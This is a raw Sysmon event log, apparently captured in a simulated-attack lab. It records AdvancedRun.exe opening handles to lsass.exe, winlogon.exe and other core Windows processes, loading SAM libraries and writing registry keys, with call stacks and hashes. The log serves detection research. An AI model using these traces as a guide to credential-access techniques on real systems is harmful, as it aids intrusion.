20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.363{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004068975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.362{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004068516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:06.618{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEACC.DLLMD5=0C5492DFFA271BC1912BADFEBB497907,SHA256=536C445B9D489749547FAC1D0B01AF7F430BBFE31BCD2924E7DB3BFE66785452trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.017{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004068486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:05.004{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=1029851F233A4FFD537D7B924F6078E9,SHA256=48FAA459585093FD2423A991B264219E5D7E0D37328D5CE6BDA917AB02607E31trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004068463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.012{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004068461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.010{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 
12241200x80000000000000004068460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.010{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004068459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.009{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004068458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:10:05.009{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004068457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:10:05.008{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004068440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.998{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samcli.dll10.0.14393.0 (rs1_release.160715-1616)Security Accounts Manager Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMCLI.DLLMD5=F67DFB27AACE637BEA56D3EB0726B943,SHA256=3663C2F3579BEBAF433AF101902ADA3FF87A3A6005F0AF77D1894458286E3656trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004068426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:04.993{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-12F5-61EB-5008-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004068425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
